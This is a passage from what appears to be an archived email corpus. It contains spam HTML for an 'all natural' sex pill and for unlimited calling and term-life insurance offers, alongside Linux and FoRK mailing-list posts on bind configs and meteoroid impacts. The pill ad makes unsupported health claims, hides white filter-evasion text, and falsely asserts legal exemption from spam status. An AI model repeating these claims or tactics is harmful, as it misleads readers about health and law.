                   &lt;p class=3D"MsoNormal" style=3D"margin-top:0in;margin-ri=
 ght:.25in;margin-bottom:0in;
 margin-left:.25in;margin-bottom:.0001pt" align=3D"left"&gt;&lt;u&gt;&lt;font face=3D"Q=
 uickType Condensed" size=3D"4" color=3D"#FF0000"&gt;MEN&lt;/font&gt;&lt;/u&gt;&lt;font color=
 =3D"#000080"&gt;&lt;font face=3D"QuickType Condensed" size=3D"4"&gt; easily achieve=
  NATURALLY TRIGGERED erections, like they are 18 all over again&amp;nbsp;&lt;/fon=
 t&gt;&lt;font face=3D"Century Gothic" size=3D"2"&gt;&lt;span style=3D"mso-bidi-font-si=
 ze: 10.0pt; color: black"&gt;&lt;br&gt;
                   &lt;br&gt;
                   &lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;u&gt;&lt;font face=3D"QuickType Condense=
 d" size=3D"4" color=3D"#FF0000"&gt;WOMEN&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000080" fa=
 ce=3D"QuickType Condensed" size=3D"4"&gt; will pump with naturally flowing ju=
 ices from the start and will achieve the most intense orgasms of their liv=
 es !&lt;/font&gt;&lt;span style=3D"mso-bidi-font-size: 10.0pt; mso-fareast-font-fam=
 ily: Times New Roman; color: black; mso-ansi-language: EN-US; mso-fareast-=
 language: EN-US; mso-bidi-language: AR-SA"&gt;&lt;font face=3D"Century Gothic" s=
 ize=3D"2"&gt;&lt;b style=3D"mso-bidi-font-weight: normal; mso-bidi-font-size: 10=
 0pt; mso-fareast-font-family: Times New Roman; color: black; mso-ansi-lan=
 guage: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"&gt;&amp;nbsp=
 ;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
                   &lt;/b&gt;&lt;/font&gt;&lt;/span&gt;
                       &lt;/p&gt;
                   &lt;p class=3D"MsoNormal" style=3D"margin-top:0in;margin-ri=
 ght:.25in;margin-bottom:0in;
 margin-left:.25in;margin-bottom:.0001pt" align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td width=3D"321"&gt;
                       &lt;p align=3D"center"&gt;&lt;i&gt;&lt;font color=3D"#FF0000" face=3D=
 "Franklin Gothic Demi" size=3D"5"&gt;Jumpstart
       Sexual Desire in both Men &amp;amp; Women, to the point that you never t=
 hought possible !&lt;/font&gt;&lt;/i&gt;
                       &lt;/p&gt;
                       &lt;p align=3D"center"&gt;&lt;font color=3D"#FFFFFF"&gt;.&lt;/font&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td width=3D"321"&gt;
           &lt;ul&gt;
             &lt;li&gt;
               &lt;p style=3D"line-height: 150%; margin-left: 10; margin-right=
 : 5; margin-top: 0; margin-bottom: 0" align=3D"left"&gt;&lt;b&gt;&lt;font color=3D"#FF=
 0000" face=3D"Century Gothic" size=3D"4"&gt;Has&lt;/font&gt;&lt;font color=3D"#000080"=
  face=3D"Century Gothic" size=3D"4"&gt; your sex life become dull, mundane, o=
 r even
           non-existent?&lt;/font&gt;&lt;/b&gt;
             &lt;/li&gt;
             &lt;li&gt;
               &lt;p style=3D"line-height: 150%; margin-left: 10; margin-right=
 : 5; margin-top: 0; margin-bottom: 0" align=3D"left"&gt;&lt;b&gt;&lt;font color=3D"#FF=
 0000" face=3D"Century Gothic" size=3D"4"&gt;Are&lt;/font&gt;&lt;font color=3D"#000080"=
  face=3D"Century Gothic" size=3D"4"&gt; you having trouble Getting or "Keepin=
 g" an erection?&lt;/font&gt;&lt;/b&gt;
             &lt;/li&gt;
             &lt;li&gt;
               &lt;p style=3D"line-height: 150%; margin-left: 10; margin-right=
 : 5; margin-top: 0; margin-bottom: 0" align=3D"left"&gt;&lt;b&gt;&lt;font color=3D"#FF=
 0000" face=3D"Century Gothic" size=3D"4"&gt;Do&lt;/font&gt;&lt;font color=3D"#000080" =
 face=3D"Century Gothic" size=3D"4"&gt; you think you have lost the desire ?&lt;/=
 font&gt;&lt;/b&gt;
             &lt;/li&gt;
             &lt;li&gt;
               &lt;p style=3D"line-height: 150%; margin-left: 10; margin-right=
 : 5; margin-top: 0; margin-bottom: 0" align=3D"left"&gt;&lt;b&gt;&lt;font color=3D"#FF=
 0000" face=3D"Century Gothic" size=3D"4"&gt;Or&lt;/font&gt;&lt;font color=3D"#000080" =
 face=3D"Century Gothic" size=3D"4"&gt; does your desire seem more like a chor=
 e ?&lt;/font&gt;&lt;/b&gt;
             &lt;/li&gt;
           &lt;/ul&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt;
                     &lt;td width=3D"321"&gt;
                       &lt;p align=3D"center"&gt;&lt;font color=3D"#0000FF" size=3D"=
 5"&gt;&lt;a href onclick=3D"pops();"&gt;&lt;u&gt;CLICK
                       HERE FOR&lt;/u&gt;&lt;/a&gt;&lt;/font&gt;
                       &lt;p align=3D"center"&gt;&lt;font color=3D"#0000FF" size=3D"=
 5"&gt;&lt;a href onclick=3D"pops();"&gt;&lt;u&gt;MORE INFO&lt;/u&gt;&lt;/a&gt;&lt;/font&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;ul&gt;
                   &lt;p align=3D"left"&gt;&amp;nbsp;
                 &lt;/ul&gt;
               &lt;/td&gt;
               &lt;td align=3D"middle" vAlign=3D"top" width=3D"120"&gt;
                 &lt;div align=3D"right"&gt;
                 &lt;table border=3D"0" cellPadding=3D"6" cellSpacing=3D"0" wi=
 dth=3D"166"&gt;
                   &lt;tbody&gt;
                     &lt;tr&gt;
                       &lt;td align=3D"middle" bgColor=3D"#FFFFFF" width=3D"15=
 2"&gt;
                         &lt;p align=3D"left"&gt;&lt;font face=3D"Arial" size=3D"3"&gt;=
 &lt;i&gt;&lt;b&gt;Great Sex in A Bottle&lt;/b&gt;&lt;/i&gt; has been called the
                         &amp;quot;all&amp;nbsp; Natural alternative to Viagra.&amp;quo=
 t;&amp;nbsp;
                         It increases sex drive like you never thought poss=
 ible, creating natural emotional responses!  This
       fact is unlike Viagra, as Viagra is designed to chemically induce bl=
 ood flow to the penis.  Well, as you men know, that's great to stay hard, =
 but if you don't have the desire to do anything, then what's the point ? !=
 !!&lt;/font&gt;&lt;/p&gt;
                         &lt;p align=3D"left"&gt;&lt;font face=3D"Arial" size=3D"3"&gt;=
 And all
                         for as low as $1 per pill, as opposed to Viagra at=
  $10
                         per pill !&lt;/font&gt;&lt;font color=3D"#FFFFFF" face=3D"C=
 entury Gothic" size=3D"2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
                         Xerox=FFFFFFAE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=
 &amp;nbsp;&lt;/font&gt;&lt;font color=3D"#FFFFFF" face=3D"Century Gothic" size=3D"2"&gt;&amp;n=
 bsp;
                         Brother=FFFFFFAE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
                         and more!&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Compatible=
  with
                         all inkjet printers &amp;amp; plain paper inkjet faxes=
 &lt;/font&gt;&lt;/p&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/tbody&gt;
                 &lt;/table&gt;
                 &lt;/div&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" cellPadding=3D"4" cellSpacing=3D"0" width=3D"612" heig=
 ht=3D"88"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align=3D"middle" bgColor=3D"#FFFFCC" vAlign=3D"center" width=3D"=
 592" height=3D"80"&gt;
         &lt;p align=3D"left"&gt;&lt;font face=3D"Arial" size=3D"1"&gt;****************=
 **************************************************************************=
 ***************&lt;br&gt;
         This message is being sent to you in compliance with the proposed
         Federal legislation for commercial e-mail (S.1618 - SECTION 301).
         &amp;quot;Pursuant to Section 301, Paragraph (a)(2)(C) of S. 1618, fur=
 ther
         transmissions to you by the sender of this e-mail may be stopped a=
 t no
         cost to you by submitting a request to &lt;u&gt;&lt;a onclick=3D"rem();"&gt;&lt;f=
 ont color=3D"#0000FF"&gt;REMOVE&lt;/font&gt;&lt;/a&gt;&lt;font color=3D"#0000FF"&gt;
         &lt;/font&gt;&lt;/u&gt;Further, this message cannot be considered spam as long=
  as we
         include sender contact information.&amp;nbsp;You may contact us at (80=
 1)
         406-0109 to be removed from future mailings.&lt;br&gt;
         ******************************************************************=
 *****************************************&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] bind + lex + yacc...
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Jul 22, 2002 at 03:48:54PM +0100, Justin MacCarthy mentioned:
 &gt; Never having to support a large network myself, I know very little about
 &gt; this..  but what do lex &amp; yacc have to do with anything ?
 &gt; These are language parsers, used to build complilers / interptreters  and
 &gt; the like???!!!
  Bind configs are one sort of file.
  I think the person asking Kevin the question would like to have a nice
 config language like:
  domain: "bing.com"
  hosts:  www mail arse smeg twitter
  ttl:    20000
  and then using lex &amp; yacc, they could write a program that converts
 between that config file, and the tedious bind configs, and maybe even
 auto-generate a reverse DNS config file while they are at it.
  Personally, I think they are demented. It's much more a job for something
 simple like Sed or Awk. People using lex &amp; yacc just because they can make
 baby jesus cry.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How Does Unlimited Free Calling Work?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Flat-Rate Unlimited Domestic Calling?
 How does it work?
 &gt;From the registered phone line, you can call to any phone in the contiguous 48 States. You speed dial an access #, then you simply dial the number you wish to reach. That's it, how easy can it get?
 * What are the limits?
 The service is only for Voice communication, FAX or data transmissions are not supported. This is for normal residential or small business use. The only thing we ask is that you register your line correctly. If you register as a residence and it is determined that the service has been used as a business we cannot continue to offer you the service.
 What's the price?
 The price of the service is determined by the available access number. With a local access number the residential service is $43.00. If we only offer toll free (800) access in your area then residential service is $63.00. No hidden fees, just one low monthly rate billed to your credit card or drafted from your bank account.
 What calling charges are covered?
 This service will eliminate any per minute charges for: In-state and State-to-state long distance It's all included...
 One Low Monthly Flat Rate for Unlimited Calling and 0 cents per minute!!
 To purchase this product, click on:
 http://www.internationalfreecall.com
 To take a 60 minute trial of this product, send your phone number to:
 8228519@archwireless.net
 To remove yourself from this mailing list, click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=1.list&amp;id=1680
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Jon O. wrote:
 &gt; Has anyone considered the fact that these occurrances appear to
 &gt; be increasing. I'm aware that maybe more publicity surrounding
 No, it's just we've started looking. After we've actually started looking 
 for deep infrasound (pressure waves) with a network of stations designed 
 to enforced the nuke test ban treaty we've discovered that pretty big 
 impacts are the norm. Current infrasound stations can detect 
 bolides/meteoroids in ~10 T TNT scale, but some 10 kT events are 
 relatively frequent. A number of people died in the Tunguska event (1908, 
 10-15 MT), despite it hitting in the middle of nowhere.
 http://216.239.39.100/search?q=cache:637JrhGDB5gC:www.lpi.usra.edu/meetings/5thMars99/pdf/6081.pdf+bolide+impact+kT+wave&amp;hl=en&amp;ie=UTF-8
 In the Earth atmosphere a large number of bright light flashes of energies
 in light impulse of about 0.1- 1 kt TNT and higher have been registered by
 USA DoD satellites equipped with photoelectric detectors [9-11]. Intense
 light impulses are created by impacts of meteoroids disrupted in the
 atmosphere (mainly at altitudes of about 30-45 km). Several techniques for
 the assessment of meteor- oid's characteristics from the light curves and
 heights of peak intensities have been developed [3,12]. Using these
 techniques the preatmospheric kinetic energy for Fifth International
 Conference on Mars INITIATION OF SANDSTORMS: I.V.Nemtchinov, O.P.Popova,
 V.A.Rybakov, V.V.Shuvalov a number of events was determined. The biggest
 event is the 1 February 1994 with ini- tial energy as high as 30-40 kt TNT
 (or initial mass of about 400 t). The bright flash with light energy of
 about 4.5 kt TNT was caused by this meteoroid which deeply penetrated into
 the atmosphere (at an angle of 45 degrees and velocity of 24 km/s) and
 disintegrated above at altitudes of about 34 km and 21 km [9,12]. Another
 famous impact event, the Sikhote-Alin meteor shower (12 February 1947
 event), may be compared with the 1 February 1994 event. Initial masses of
 these meteoroids are probably the same, as well as the angle of trajectory
 inclination, but the initial velocity of the Sikhote-Alin is almost twice
 smaller. That caused fragmentation of 1 February 1994 meteoroid at higher
 altitudes and probably large fragments constitute a smaller part of the
 pre- breakdown mass in contrast to the Sikhote-Alin event. In a rarefied
 atmosphere of Mars analogous im- pactors will penetrate into deeper layers
 of the atmos- phere.They will disintegrate lower 15 km or even reach the
 planet surface, partially in disrupted form. Only the first disruption
 would occur if a meteoroid similar to that caused the 1 February 1994 will
 enter into the Martian atmosphere. And this body would reach the Mars
 surface as a tense swarm of fragments. The meteoroid similar to that
 caused the Sikhote-Alin event would hit the surface in a form of large
 frag- ments due to its low velocity. They will create crater with the size
 similar to that of the undisrupted meteoroid.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 &gt;
 &gt;
 &gt; &gt; "Free trade and free markets have proven their ability to lift whole
 &gt; &gt; societies out of poverty"
 &gt; &gt; I'm not a socio-political/history buff - does anybody have some clear
 &gt; &gt; examples?
 &gt;
 &gt; You're probably living in one, or you wouldn't be able to post here.
 &gt;
 When was the whole US society in poverty &amp; was that before free trade &amp; free
 markets?
 I'm looking for transitions due to free xyz.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tip of the Day: When trying to kill head lice with rubbing
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412060,1717/
 Date: 2002-09-30T23:25:20+01:00
 (Some guy with lice)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Z-app Your Term Life Business
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C1F9BE.12E451A0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Produce More in Less Time! ...with help from Roster Financial LLC and
 Zurich Life	
  Z-app Your Term Life Business Z-app Your Term Life Business	
 Z-app is the easy, fast, paperless way for agents to use Zurich Life's
 TeleLifeTM pre-application process. In just a few simple, quick steps,
 this Internet-based process can help you build more business. 	
 While other agents are just beginning to mail in their applications,
 your Z-app will already be in process at our Home Office. It's just one
 more example of the competitive edge you can count on getting with
 Zurich Life.
 ? 	 Eliminates your paperwork
 ? 	 Avoids delays by ensuring that all information submitted is
 correct and complete 	 	 
 ? 	 Potentially cuts days out of the application process
 ? 	 Increases your clients' satisfaction with improved ease,
 accuracyand speed 	 	 
 ? 	 Helps you deliver policies faster, to Zapp the competition
 NEW LOWER RATES!	 
 20-Year Certain-T 2002
 20-Yr Annual Gntd Premium*
 $250,00 Face Amount
 Premier Rate Class (Non-Tobacco) 	AGE 
 35 
 45 
 55 	MALE
 $170
 $390
 $893 	FEMALE
 $150
 $290
 $630 	 	 
 Don't delay! Call or e-mail &lt;mailto:customerservice@rosterfinancial.com&gt;
 us Today!
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
  Roster Financial Services, LLC
 Not for use with the general public. For agent use only. Not approved in
 all states.
 Certain-T 20-year is non-participating term life insurance to age 95,
 policy form S-3224, underwritten by Federal Kemper Life Assurance
 Company (FKLA), a Zurich Life Company, Schaumburg, IL 60196-6801.
 Premier means no tobacco use of any kind in the past 60 months. Premiums
 include the annual policy fee; $50.00. Suicide and other limits may
 apply. Forms and policy provisions vary by state. Policy not available
 in all states. Companion policies not available in NJ.
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message.
 Instead, go here: http://www.Insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_0007_01C1F9BE.12E451A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Z-app Your Term Life Business&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#cccccc" text=3D"#000000"&gt;
 &lt;table width=3D"565" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000066" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-101a.gif" =
 width=3D"550" height=3D"74" alt=3D'Produce More in Less Time! ...with =
 help from Roster Financial LLC and Zurich Life'&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"100%" colspan=3D"2"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-102a.gif" =
 width=3D"371" height=3D"51" alt=3D'Z-app Your Term Life Business'&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-103a.gif" =
 width=3D"179" height=3D"51" alt=3D'Z-app Your Term Life Business'&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"371" valign=3D"top"&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2" =
 background=3D"http://63.211.81.87/images/roster/20020423-4.gif"&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;
                         &lt;b&gt;Z-app&lt;/b&gt; is the easy, fast, paperless way =
 for agents to use &lt;b&gt;Zurich=20
                         Life's TeleLife&lt;sup&gt;TM&lt;/sup&gt;&lt;/b&gt; pre-application =
 process.=20
                         In just a few simple, quick steps, this =
 Internet-based=20
                         process can help you &lt;b&gt;build more =
 business&lt;/b&gt;.&lt;/font&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/spacer.gif" width=3D"8" =
 height=3D"8"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;
                         While other agents are just beginning to mail in =
 their applications,=20
                         &lt;b&gt;your Z-app will already be in process&lt;/b&gt; at =
 our Home=20
                         Office. It's just one more example of the =
 &lt;b&gt;competitive=20
                         edge you can count on&lt;/b&gt; getting with Zurich =
 Life.&lt;br&gt;
                         &lt;img =
 src=3D"http://63.211.81.87/images/roster/spacer.gif" width=3D"8" =
 height=3D"8"&gt;&lt;/font&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0" =
 background=3D"http://63.211.81.87/images/roster/20020423-202.gif"&gt;
                     &lt;tr&gt;=20
                       &lt;td colspan=3D"3" valign=3D"top" =
 align=3D"left"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-201.gif" width=3D"367" =
 height=3D"21"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;font color=3D"#FFFFFF"&gt;&amp;#149;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"85%"&gt;=20
                         &lt;p&gt;&lt;b&gt;&lt;font size=3D"2" =
 color=3D"#FFFFFF"&gt;Eliminates your paperwork&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                       &lt;/td&gt;
                       &lt;td width=3D"9"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;font color=3D"#FFFFFF"&gt;&amp;#149;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"85%"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#FFFFFF"&gt;
                         Avoids delays by ensuring that all information =
 submitted is correct and complete&lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                       &lt;td width=3D"9"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;font color=3D"#FFFFFF"&gt;&amp;#149;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"85%"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#FFFFFF"&gt;
                         Potentially cuts days out of the application =
 process &lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                       &lt;td width=3D"9"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;font color=3D"#FFFFFF"&gt;&amp;#149;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"85%"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#FFFFFF"&gt;
                         Increases your clients' satisfaction with =
 improved ease, accuracyand speed&lt;/font&gt;&lt;/b&gt;=20
                       &lt;/td&gt;
                       &lt;td width=3D"9"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"6%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;font color=3D"#FFFFFF"&gt;&amp;#149;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
                       &lt;td width=3D"85%"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#FFFFFF"&gt;
                         Helps you deliver policies faster, to Zapp the =
 competition&lt;/font&gt;&lt;/b&gt;
                       &lt;/td&gt;
                       &lt;td width=3D"9"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td colspan=3D"3" align=3D"left" =
 valign=3D"top"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-203.gif" width=3D"367" =
 height=3D"29"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;/font&gt;=20
                 &lt;/td&gt;
                 &lt;td width=3D"179" valign=3D"top" align=3D"left"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-105a.jpg" =
 width=3D"179" height=3D"401"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
             &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#666666"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF"&gt;NEW LOWER =
 RATES!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"60%" align=3D"center"&gt;
                   &lt;font size=3D"4"&gt;&lt;b&gt;20-Year Certain-T =
 2002&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
                   &lt;font size=3D"2"&gt;20-Yr Annual Gntd Premium*&lt;br&gt;
                   $250,00 Face Amount&lt;br&gt;
                   Premier Rate Class (Non-Tobacco) &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"10%" align=3D"center"&gt;
                   &lt;font size=3D"2"&gt;AGE &lt;br&gt;
                   &lt;font color=3D"#666666"&gt;35 &lt;br&gt;
                   45 &lt;br&gt;
                   55&lt;/font&gt; &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"10%" align=3D"center"&gt;
                   &lt;font size=3D"2"&gt;MALE&lt;br&gt;
                   &lt;font color=3D"#000099"&gt;$170&lt;br&gt;
                   $390&lt;br&gt;
                   $893&lt;/font&gt;&lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"10%" align=3D"center"&gt;
                   &lt;font size=3D"2"&gt;FEMALE&lt;br&gt;
                   &lt;font color=3D"#000099"&gt;$150&lt;br&gt;
                   $290&lt;br&gt;
                   $630&lt;/font&gt;&lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"10%" align=3D"center"&gt;&amp;nbsp;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"5" bgcolor=3D"#000066"&gt;&lt;img =
 src=3D"http://63.211.81.87/spacer.gif" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;&lt;b&gt;
             Don't delay! Call or &lt;a =
 href=3D"mailto:customerservice@rosterfinancial.com"&gt;e-mail&lt;/a&gt; us =
 Today!&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-3b.gif" width=3D"527" =
 height=3D"109"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;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 color=3D"#000000"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;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value=3D"customerservice@rosterfinancial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Roster Financial Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/roster/20020423-5.gif" width=3D"339" =
 height=3D"81" alt=3D"Roster Financial Services, LLC"&gt;&lt;br&gt;
             &lt;/b&gt;=20
             &lt;p align=3D"left"&gt;&lt;font size=3D"1"&gt;Not for use with the =
 general public.=20
               For agent use only. Not approved in all states.&lt;br&gt;
